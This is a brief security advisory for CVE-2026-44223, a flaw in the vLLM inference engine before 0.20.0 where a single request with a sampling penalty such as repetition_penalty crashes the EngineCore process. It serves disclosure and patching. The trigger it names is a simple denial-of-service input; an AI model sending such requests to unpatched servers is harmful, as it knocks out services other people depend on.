Runtime Error in vLLM's Inference Engine Affects Large Language Models
CVE-2026-44223
6.5MEDIUM
What is CVE-2026-44223?
The vLLM inference and serving engine, used for large language models, experiences a critical issue in versions prior to 0.20.0. The specific flaw lies in the extract_hidden_states speculative decoding proposer, which returns a tensor with an incorrect shape after the initial decode step. This inconsistency triggers a RuntimeError that crashes the EngineCore process when any request in a batch employs sampling penalty parameters such as repetition_penalty, frequency_penalty, or presence_penalty. Notably, even a single request incorporating a sampling penalty (e.g., with "repetition_penalty": 1.1) is adequate to lead to a server crash. This vulnerability has been rectified in version 0.20.0.
Affected Version(s)
vllm >= 0.18.0, < 0.20.0
